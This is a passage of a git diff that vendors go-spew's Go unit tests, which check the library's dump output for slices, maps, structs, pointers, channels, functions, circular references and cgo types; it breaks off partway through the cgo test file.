+	v3Len := fmt.Sprintf("%d", len(v3))
+	v3Cap := fmt.Sprintf("%d", cap(v3))
+	nv3 := (*[]interface{})(nil)
+	pv3 := &v3
+	v3Addr := fmt.Sprintf("%p", pv3)
+	pv3Addr := fmt.Sprintf("%p", &pv3)
+	v3t := "[]interface {}"
+	v3t2 := "string"
+	v3t3 := "int"
+	v3t4 := "uint"
+	v3t5 := "interface {}"
+	v3s := "(len=" + v3Len + " cap=" + v3Cap + ") {\n (" + v3t2 + ") " +
+		"(len=" + v3i0Len + ") \"one\",\n (" + v3t3 + ") 2,\n (" +
+		v3t4 + ") 3,\n (" + v3t5 + ") <nil>\n}"
+	addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+	addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n")
+	addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n")
+	addDumpTest(nv3, "(*"+v3t+")(<nil>)\n")
+
+	// Slice containing bytes.
+	v4 := []byte{
+		0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18,
+		0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20,
+		0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28,
+		0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30,
+		0x31, 0x32,
+	}
+	v4Len := fmt.Sprintf("%d", len(v4))
+	v4Cap := fmt.Sprintf("%d", cap(v4))
+	nv4 := (*[]byte)(nil)
+	pv4 := &v4
+	v4Addr := fmt.Sprintf("%p", pv4)
+	pv4Addr := fmt.Sprintf("%p", &pv4)
+	v4t := "[]uint8"
+	v4s := "(len=" + v4Len + " cap=" + v4Cap + ") " +
+		"{\n 00000000  11 12 13 14 15 16 17 18  19 1a 1b 1c 1d 1e 1f 20" +
+		"  |............... |\n" +
+		" 00000010  21 22 23 24 25 26 27 28  29 2a 2b 2c 2d 2e 2f 30" +
+		"  |!\"#$%&'()*+,-./0|\n" +
+		" 00000020  31 32                                           " +
+		"  |12|\n}"
+	addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+	addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n")
+	addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n")
+	addDumpTest(nv4, "(*"+v4t+")(<nil>)\n")
+
+	// Nil slice.
+	v5 := []int(nil)
+	nv5 := (*[]int)(nil)
+	pv5 := &v5
+	v5Addr := fmt.Sprintf("%p", pv5)
+	pv5Addr := fmt.Sprintf("%p", &pv5)
+	v5t := "[]int"
+	v5s := "<nil>"
+	addDumpTest(v5, "("+v5t+") "+v5s+"\n")
+	addDumpTest(pv5, "(*"+v5t+")("+v5Addr+")("+v5s+")\n")
+	addDumpTest(&pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")("+v5s+")\n")
+	addDumpTest(nv5, "(*"+v5t+")(<nil>)\n")
+}
+
+func addStringDumpTests() {
+	// Standard string.
+	v := "test"
+	vLen := fmt.Sprintf("%d", len(v))
+	nv := (*string)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "string"
+	vs := "(len=" + vLen + ") \"test\""
+	addDumpTest(v, "("+vt+") "+vs+"\n")
+	addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+	addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+	addDumpTest(nv, "(*"+vt+")(<nil>)\n")
+}
+
+func addInterfaceDumpTests() {
+	// Nil interface.
+	var v interface{}
+	nv := (*interface{})(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "interface {}"
+	vs := "<nil>"
+	addDumpTest(v, "("+vt+") "+vs+"\n")
+	addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+	addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+	addDumpTest(nv, "(*"+vt+")(<nil>)\n")
+
+	// Sub-interface.
+	v2 := interface{}(uint16(65535))
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "uint16"
+	v2s := "65535"
+	addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+	addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+	addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+}
+
+func addMapDumpTests() {
+	// Map with string keys and int vals.
+	k := "one"
+	kk := "two"
+	m := map[string]int{k: 1, kk: 2}
+	klen := fmt.Sprintf("%d", len(k)) // not kLen to shut golint up
+	kkLen := fmt.Sprintf("%d", len(kk))
+	mLen := fmt.Sprintf("%d", len(m))
+	nilMap := map[string]int(nil)
+	nm := (*map[string]int)(nil)
+	pm := &m
+	mAddr := fmt.Sprintf("%p", pm)
+	pmAddr := fmt.Sprintf("%p", &pm)
+	mt := "map[string]int"
+	mt1 := "string"
+	mt2 := "int"
+	ms := "(len=" + mLen + ") {\n (" + mt1 + ") (len=" + klen + ") " +
+		"\"one\": (" + mt2 + ") 1,\n (" + mt1 + ") (len=" + kkLen +
+		") \"two\": (" + mt2 + ") 2\n}"
+	ms2 := "(len=" + mLen + ") {\n (" + mt1 + ") (len=" + kkLen + ") " +
+		"\"two\": (" + mt2 + ") 2,\n (" + mt1 + ") (len=" + klen +
+		") \"one\": (" + mt2 + ") 1\n}"
+	addDumpTest(m, "("+mt+") "+ms+"\n", "("+mt+") "+ms2+"\n")
+	addDumpTest(pm, "(*"+mt+")("+mAddr+")("+ms+")\n",
+		"(*"+mt+")("+mAddr+")("+ms2+")\n")
+	addDumpTest(&pm, "(**"+mt+")("+pmAddr+"->"+mAddr+")("+ms+")\n",
+		"(**"+mt+")("+pmAddr+"->"+mAddr+")("+ms2+")\n")
+	addDumpTest(nm, "(*"+mt+")(<nil>)\n")
+	addDumpTest(nilMap, "("+mt+") <nil>\n")
+
+	// Map with custom formatter type on pointer receiver only keys and vals.
+	k2 := pstringer("one")
+	v2 := pstringer("1")
+	m2 := map[pstringer]pstringer{k2: v2}
+	k2Len := fmt.Sprintf("%d", len(k2))
+	v2Len := fmt.Sprintf("%d", len(v2))
+	m2Len := fmt.Sprintf("%d", len(m2))
+	nilMap2 := map[pstringer]pstringer(nil)
+	nm2 := (*map[pstringer]pstringer)(nil)
+	pm2 := &m2
+	m2Addr := fmt.Sprintf("%p", pm2)
+	pm2Addr := fmt.Sprintf("%p", &pm2)
+	m2t := "map[spew_test.pstringer]spew_test.pstringer"
+	m2t1 := "spew_test.pstringer"
+	m2t2 := "spew_test.pstringer"
+	m2s := "(len=" + m2Len + ") {\n (" + m2t1 + ") (len=" + k2Len + ") " +
+		"stringer one: (" + m2t2 + ") (len=" + v2Len + ") stringer 1\n}"
+	if spew.UnsafeDisabled {
+		m2s = "(len=" + m2Len + ") {\n (" + m2t1 + ") (len=" + k2Len +
+			") " + "\"one\": (" + m2t2 + ") (len=" + v2Len +
+			") \"1\"\n}"
+	}
+	addDumpTest(m2, "("+m2t+") "+m2s+"\n")
+	addDumpTest(pm2, "(*"+m2t+")("+m2Addr+")("+m2s+")\n")
+	addDumpTest(&pm2, "(**"+m2t+")("+pm2Addr+"->"+m2Addr+")("+m2s+")\n")
+	addDumpTest(nm2, "(*"+m2t+")(<nil>)\n")
+	addDumpTest(nilMap2, "("+m2t+") <nil>\n")
+
+	// Map with interface keys and values.
+	k3 := "one"
+	k3Len := fmt.Sprintf("%d", len(k3))
+	m3 := map[interface{}]interface{}{k3: 1}
+	m3Len := fmt.Sprintf("%d", len(m3))
+	nilMap3 := map[interface{}]interface{}(nil)
+	nm3 := (*map[interface{}]interface{})(nil)
+	pm3 := &m3
+	m3Addr := fmt.Sprintf("%p", pm3)
+	pm3Addr := fmt.Sprintf("%p", &pm3)
+	m3t := "map[interface {}]interface {}"
+	m3t1 := "string"
+	m3t2 := "int"
+	m3s := "(len=" + m3Len + ") {\n (" + m3t1 + ") (len=" + k3Len + ") " +
+		"\"one\": (" + m3t2 + ") 1\n}"
+	addDumpTest(m3, "("+m3t+") "+m3s+"\n")
+	addDumpTest(pm3, "(*"+m3t+")("+m3Addr+")("+m3s+")\n")
+	addDumpTest(&pm3, "(**"+m3t+")("+pm3Addr+"->"+m3Addr+")("+m3s+")\n")
+	addDumpTest(nm3, "(*"+m3t+")(<nil>)\n")
+	addDumpTest(nilMap3, "("+m3t+") <nil>\n")
+
+	// Map with nil interface value.
+	k4 := "nil"
+	k4Len := fmt.Sprintf("%d", len(k4))
+	m4 := map[string]interface{}{k4: nil}
+	m4Len := fmt.Sprintf("%d", len(m4))
+	nilMap4 := map[string]interface{}(nil)
+	nm4 := (*map[string]interface{})(nil)
+	pm4 := &m4
+	m4Addr := fmt.Sprintf("%p", pm4)
+	pm4Addr := fmt.Sprintf("%p", &pm4)
+	m4t := "map[string]interface {}"
+	m4t1 := "string"
+	m4t2 := "interface {}"
+	m4s := "(len=" + m4Len + ") {\n (" + m4t1 + ") (len=" + k4Len + ")" +
+		" \"nil\": (" + m4t2 + ") <nil>\n}"
+	addDumpTest(m4, "("+m4t+") "+m4s+"\n")
+	addDumpTest(pm4, "(*"+m4t+")("+m4Addr+")("+m4s+")\n")
+	addDumpTest(&pm4, "(**"+m4t+")("+pm4Addr+"->"+m4Addr+")("+m4s+")\n")
+	addDumpTest(nm4, "(*"+m4t+")(<nil>)\n")
+	addDumpTest(nilMap4, "("+m4t+") <nil>\n")
+}
+
+func addStructDumpTests() {
+	// Struct with primitives.
+	type s1 struct {
+		a int8
+		b uint8
+	}
+	v := s1{127, 255}
+	nv := (*s1)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "spew_test.s1"
+	vt2 := "int8"
+	vt3 := "uint8"
+	vs := "{\n a: (" + vt2 + ") 127,\n b: (" + vt3 + ") 255\n}"
+	addDumpTest(v, "("+vt+") "+vs+"\n")
+	addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+	addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+	addDumpTest(nv, "(*"+vt+")(<nil>)\n")
+
+	// Struct that contains another struct.
+	type s2 struct {
+		s1 s1
+		b  bool
+	}
+	v2 := s2{s1{127, 255}, true}
+	nv2 := (*s2)(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "spew_test.s2"
+	v2t2 := "spew_test.s1"
+	v2t3 := "int8"
+	v2t4 := "uint8"
+	v2t5 := "bool"
+	v2s := "{\n s1: (" + v2t2 + ") {\n  a: (" + v2t3 + ") 127,\n  b: (" +
+		v2t4 + ") 255\n },\n b: (" + v2t5 + ") true\n}"
+	addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+	addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+	addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+	addDumpTest(nv2, "(*"+v2t+")(<nil>)\n")
+
+	// Struct that contains custom type with Stringer pointer interface via both
+	// exported and unexported fields.
+	type s3 struct {
+		s pstringer
+		S pstringer
+	}
+	v3 := s3{"test", "test2"}
+	nv3 := (*s3)(nil)
+	pv3 := &v3
+	v3Addr := fmt.Sprintf("%p", pv3)
+	pv3Addr := fmt.Sprintf("%p", &pv3)
+	v3t := "spew_test.s3"
+	v3t2 := "spew_test.pstringer"
+	v3s := "{\n s: (" + v3t2 + ") (len=4) stringer test,\n S: (" + v3t2 +
+		") (len=5) stringer test2\n}"
+	v3sp := v3s
+	if spew.UnsafeDisabled {
+		v3s = "{\n s: (" + v3t2 + ") (len=4) \"test\",\n S: (" +
+			v3t2 + ") (len=5) \"test2\"\n}"
+		v3sp = "{\n s: (" + v3t2 + ") (len=4) \"test\",\n S: (" +
+			v3t2 + ") (len=5) stringer test2\n}"
+	}
+	addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+	addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3sp+")\n")
+	addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3sp+")\n")
+	addDumpTest(nv3, "(*"+v3t+")(<nil>)\n")
+
+	// Struct that contains embedded struct and field to same struct.
+	e := embed{"embedstr"}
+	eLen := fmt.Sprintf("%d", len("embedstr"))
+	v4 := embedwrap{embed: &e, e: &e}
+	nv4 := (*embedwrap)(nil)
+	pv4 := &v4
+	eAddr := fmt.Sprintf("%p", &e)
+	v4Addr := fmt.Sprintf("%p", pv4)
+	pv4Addr := fmt.Sprintf("%p", &pv4)
+	v4t := "spew_test.embedwrap"
+	v4t2 := "spew_test.embed"
+	v4t3 := "string"
+	v4s := "{\n embed: (*" + v4t2 + ")(" + eAddr + ")({\n  a: (" + v4t3 +
+		") (len=" + eLen + ") \"embedstr\"\n }),\n e: (*" + v4t2 +
+		")(" + eAddr + ")({\n  a: (" + v4t3 + ") (len=" + eLen + ")" +
+		" \"embedstr\"\n })\n}"
+	addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+	addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n")
+	addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n")
+	addDumpTest(nv4, "(*"+v4t+")(<nil>)\n")
+}
+
+func addUintptrDumpTests() {
+	// Null pointer.
+	v := uintptr(0)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "uintptr"
+	vs := "<nil>"
+	addDumpTest(v, "("+vt+") "+vs+"\n")
+	addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+	addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+
+	// Address of real variable.
+	i := 1
+	v2 := uintptr(unsafe.Pointer(&i))
+	nv2 := (*uintptr)(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "uintptr"
+	v2s := fmt.Sprintf("%p", &i)
+	addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+	addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+	addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+	addDumpTest(nv2, "(*"+v2t+")(<nil>)\n")
+}
+
+func addUnsafePointerDumpTests() {
+	// Null pointer.
+	v := unsafe.Pointer(uintptr(0))
+	nv := (*unsafe.Pointer)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "unsafe.Pointer"
+	vs := "<nil>"
+	addDumpTest(v, "("+vt+") "+vs+"\n")
+	addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+	addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+	addDumpTest(nv, "(*"+vt+")(<nil>)\n")
+
+	// Address of real variable.
+	i := 1
+	v2 := unsafe.Pointer(&i)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "unsafe.Pointer"
+	v2s := fmt.Sprintf("%p", &i)
+	addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+	addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+	addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+	addDumpTest(nv, "(*"+vt+")(<nil>)\n")
+}
+
+func addChanDumpTests() {
+	// Nil channel.
+	var v chan int
+	pv := &v
+	nv := (*chan int)(nil)
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "chan int"
+	vs := "<nil>"
+	addDumpTest(v, "("+vt+") "+vs+"\n")
+	addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+	addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+	addDumpTest(nv, "(*"+vt+")(<nil>)\n")
+
+	// Real channel.
+	v2 := make(chan int)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "chan int"
+	v2s := fmt.Sprintf("%p", v2)
+	addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+	addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+	addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+}
+
+func addFuncDumpTests() {
+	// Function with no params and no returns.
+	v := addIntDumpTests
+	nv := (*func())(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "func()"
+	vs := fmt.Sprintf("%p", v)
+	addDumpTest(v, "("+vt+") "+vs+"\n")
+	addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+	addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+	addDumpTest(nv, "(*"+vt+")(<nil>)\n")
+
+	// Function with param and no returns.
+	v2 := TestDump
+	nv2 := (*func(*testing.T))(nil)
+	pv2 := &v2
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "func(*testing.T)"
+	v2s := fmt.Sprintf("%p", v2)
+	addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+	addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+	addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+	addDumpTest(nv2, "(*"+v2t+")(<nil>)\n")
+
+	// Function with multiple params and multiple returns.
+	var v3 = func(i int, s string) (b bool, err error) {
+		return true, nil
+	}
+	nv3 := (*func(int, string) (bool, error))(nil)
+	pv3 := &v3
+	v3Addr := fmt.Sprintf("%p", pv3)
+	pv3Addr := fmt.Sprintf("%p", &pv3)
+	v3t := "func(int, string) (bool, error)"
+	v3s := fmt.Sprintf("%p", v3)
+	addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+	addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n")
+	addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n")
+	addDumpTest(nv3, "(*"+v3t+")(<nil>)\n")
+}
+
+func addCircularDumpTests() {
+	// Struct that is circular through self referencing.
+	type circular struct {
+		c *circular
+	}
+	v := circular{nil}
+	v.c = &v
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "spew_test.circular"
+	vs := "{\n c: (*" + vt + ")(" + vAddr + ")({\n  c: (*" + vt + ")(" +
+		vAddr + ")(<already shown>)\n })\n}"
+	vs2 := "{\n c: (*" + vt + ")(" + vAddr + ")(<already shown>)\n}"
+	addDumpTest(v, "("+vt+") "+vs+"\n")
+	addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs2+")\n")
+	addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs2+")\n")
+
+	// Structs that are circular through cross referencing.
+	v2 := xref1{nil}
+	ts2 := xref2{&v2}
+	v2.ps2 = &ts2
+	pv2 := &v2
+	ts2Addr := fmt.Sprintf("%p", &ts2)
+	v2Addr := fmt.Sprintf("%p", pv2)
+	pv2Addr := fmt.Sprintf("%p", &pv2)
+	v2t := "spew_test.xref1"
+	v2t2 := "spew_test.xref2"
+	v2s := "{\n ps2: (*" + v2t2 + ")(" + ts2Addr + ")({\n  ps1: (*" + v2t +
+		")(" + v2Addr + ")({\n   ps2: (*" + v2t2 + ")(" + ts2Addr +
+		")(<already shown>)\n  })\n })\n}"
+	v2s2 := "{\n ps2: (*" + v2t2 + ")(" + ts2Addr + ")({\n  ps1: (*" + v2t +
+		")(" + v2Addr + ")(<already shown>)\n })\n}"
+	addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+	addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s2+")\n")
+	addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s2+")\n")
+
+	// Structs that are indirectly circular.
+	v3 := indirCir1{nil}
+	tic2 := indirCir2{nil}
+	tic3 := indirCir3{&v3}
+	tic2.ps3 = &tic3
+	v3.ps2 = &tic2
+	pv3 := &v3
+	tic2Addr := fmt.Sprintf("%p", &tic2)
+	tic3Addr := fmt.Sprintf("%p", &tic3)
+	v3Addr := fmt.Sprintf("%p", pv3)
+	pv3Addr := fmt.Sprintf("%p", &pv3)
+	v3t := "spew_test.indirCir1"
+	v3t2 := "spew_test.indirCir2"
+	v3t3 := "spew_test.indirCir3"
+	v3s := "{\n ps2: (*" + v3t2 + ")(" + tic2Addr + ")({\n  ps3: (*" + v3t3 +
+		")(" + tic3Addr + ")({\n   ps1: (*" + v3t + ")(" + v3Addr +
+		")({\n    ps2: (*" + v3t2 + ")(" + tic2Addr +
+		")(<already shown>)\n   })\n  })\n })\n}"
+	v3s2 := "{\n ps2: (*" + v3t2 + ")(" + tic2Addr + ")({\n  ps3: (*" + v3t3 +
+		")(" + tic3Addr + ")({\n   ps1: (*" + v3t + ")(" + v3Addr +
+		")(<already shown>)\n  })\n })\n}"
+	addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+	addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s2+")\n")
+	addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s2+")\n")
+}
+
+func addPanicDumpTests() {
+	// Type that panics in its Stringer interface.
+	v := panicer(127)
+	nv := (*panicer)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "spew_test.panicer"
+	vs := "(PANIC=test panic)127"
+	addDumpTest(v, "("+vt+") "+vs+"\n")
+	addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+	addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+	addDumpTest(nv, "(*"+vt+")(<nil>)\n")
+}
+
+func addErrorDumpTests() {
+	// Type that has a custom Error interface.
+	v := customError(127)
+	nv := (*customError)(nil)
+	pv := &v
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "spew_test.customError"
+	vs := "error: 127"
+	addDumpTest(v, "("+vt+") "+vs+"\n")
+	addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+	addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+	addDumpTest(nv, "(*"+vt+")(<nil>)\n")
+}
+
+// TestDump executes all of the tests described by dumpTests.
+func TestDump(t *testing.T) {
+	// Setup tests.
+	addIntDumpTests()
+	addUintDumpTests()
+	addBoolDumpTests()
+	addFloatDumpTests()
+	addComplexDumpTests()
+	addArrayDumpTests()
+	addSliceDumpTests()
+	addStringDumpTests()
+	addInterfaceDumpTests()
+	addMapDumpTests()
+	addStructDumpTests()
+	addUintptrDumpTests()
+	addUnsafePointerDumpTests()
+	addChanDumpTests()
+	addFuncDumpTests()
+	addCircularDumpTests()
+	addPanicDumpTests()
+	addErrorDumpTests()
+	addCgoDumpTests()
+
+	t.Logf("Running %d tests", len(dumpTests))
+	for i, test := range dumpTests {
+		buf := new(bytes.Buffer)
+		spew.Fdump(buf, test.in)
+		s := buf.String()
+		if testFailed(s, test.wants) {
+			t.Errorf("Dump #%d\n got: %s %s", i, s, stringizeWants(test.wants))
+			continue
+		}
+	}
+}
+
+func TestDumpSortedKeys(t *testing.T) {
+	cfg := spew.ConfigState{SortKeys: true}
+	s := cfg.Sdump(map[int]string{1: "1", 3: "3", 2: "2"})
+	expected := "(map[int]string) (len=3) {\n(int) 1: (string) (len=1) " +
+		"\"1\",\n(int) 2: (string) (len=1) \"2\",\n(int) 3: (string) " +
+		"(len=1) \"3\"\n" +
+		"}\n"
+	if s != expected {
+		t.Errorf("Sorted keys mismatch:\n  %v %v", s, expected)
+	}
+
+	s = cfg.Sdump(map[stringer]int{"1": 1, "3": 3, "2": 2})
+	expected = "(map[spew_test.stringer]int) (len=3) {\n" +
+		"(spew_test.stringer) (len=1) stringer 1: (int) 1,\n" +
+		"(spew_test.stringer) (len=1) stringer 2: (int) 2,\n" +
+		"(spew_test.stringer) (len=1) stringer 3: (int) 3\n" +
+		"}\n"
+	if s != expected {
+		t.Errorf("Sorted keys mismatch:\n  %v %v", s, expected)
+	}
+
+	s = cfg.Sdump(map[pstringer]int{pstringer("1"): 1, pstringer("3"): 3, pstringer("2"): 2})
+	expected = "(map[spew_test.pstringer]int) (len=3) {\n" +
+		"(spew_test.pstringer) (len=1) stringer 1: (int) 1,\n" +
+		"(spew_test.pstringer) (len=1) stringer 2: (int) 2,\n" +
+		"(spew_test.pstringer) (len=1) stringer 3: (int) 3\n" +
+		"}\n"
+	if spew.UnsafeDisabled {
+		expected = "(map[spew_test.pstringer]int) (len=3) {\n" +
+			"(spew_test.pstringer) (len=1) \"1\": (int) 1,\n" +
+			"(spew_test.pstringer) (len=1) \"2\": (int) 2,\n" +
+			"(spew_test.pstringer) (len=1) \"3\": (int) 3\n" +
+			"}\n"
+	}
+	if s != expected {
+		t.Errorf("Sorted keys mismatch:\n  %v %v", s, expected)
+	}
+
+	s = cfg.Sdump(map[customError]int{customError(1): 1, customError(3): 3, customError(2): 2})
+	expected = "(map[spew_test.customError]int) (len=3) {\n" +
+		"(spew_test.customError) error: 1: (int) 1,\n" +
+		"(spew_test.customError) error: 2: (int) 2,\n" +
+		"(spew_test.customError) error: 3: (int) 3\n" +
+		"}\n"
+	if s != expected {
+		t.Errorf("Sorted keys mismatch:\n  %v %v", s, expected)
+	}
+
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go b/vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go
new file mode 100644
index 0000000000..6ab180809a
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/dumpcgo_test.go
@@ -0,0 +1,99 @@
+// Copyright (c) 2013-2016 Dave Collins <dave@davec.name>
+//
+// Permission to use, copy, modify, and distribute this software for any
+// purpose with or without fee is hereby granted, provided that the above
+// copyright notice and this permission notice appear in all copies.
+//
+// THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+// WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+// MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+// ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+// WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+// ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+// OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+// NOTE: Due to the following build constraints, this file will only be compiled
+// when both cgo is supported and "-tags testcgo" is added to the go test
+// command line.  This means the cgo tests are only added (and hence run) when
+// specifially requested.  This configuration is used because spew itself
+// does not require cgo to run even though it does handle certain cgo types
+// specially.  Rather than forcing all clients to require cgo and an external
+// C compiler just to run the tests, this scheme makes them optional.
+// +build cgo,testcgo
+
+package spew_test
+
+import (
+	"fmt"
+
+	"github.com/davecgh/go-spew/spew/testdata"
+)
+
+func addCgoDumpTests() {
+	// C char pointer.
+	v := testdata.GetCgoCharPointer()
+	nv := testdata.GetCgoNullCharPointer()
+	pv := &v
+	vcAddr := fmt.Sprintf("%p", v)
+	vAddr := fmt.Sprintf("%p", pv)
+	pvAddr := fmt.Sprintf("%p", &pv)
+	vt := "*testdata._Ctype_char"
+	vs := "116"
+	addDumpTest(v, "("+vt+")("+vcAddr+")("+vs+")\n")
+	addDumpTest(pv, "(*"+vt+")("+vAddr+"->"+vcAddr+")("+vs+")\n")
+	addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+"->"+vcAddr+")("+vs+")\n")
+	addDumpTest(nv, "("+vt+")(<nil>)\n")
+
+	// C char array.
+	v2, v2l, v2c := testdata.GetCgoCharArray()
+	v2Len := fmt.Sprintf("%d", v2l)
+	v2Cap := fmt.Sprintf("%d", v2c)
+	v2t := "[6]testdata._Ctype_char"
+	v2s := "(len=" + v2Len + " cap=" + v2Cap + ") " +
+		"{\n 00000000  74 65 73 74 32 00                               " +
+		"  |test2.|\n}"
+	addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+
+	// C unsigned char array.
+	v3, v3l, v3c := testdata.GetCgoUnsignedCharArray()
+	v3Len := fmt.Sprintf("%d", v3l)
+	v3Cap := fmt.Sprintf("%d", v3c)
+	v3t := "[6]testdata._Ctype_unsignedchar"
+	v3t2 := "[6]testdata._Ctype_uchar"
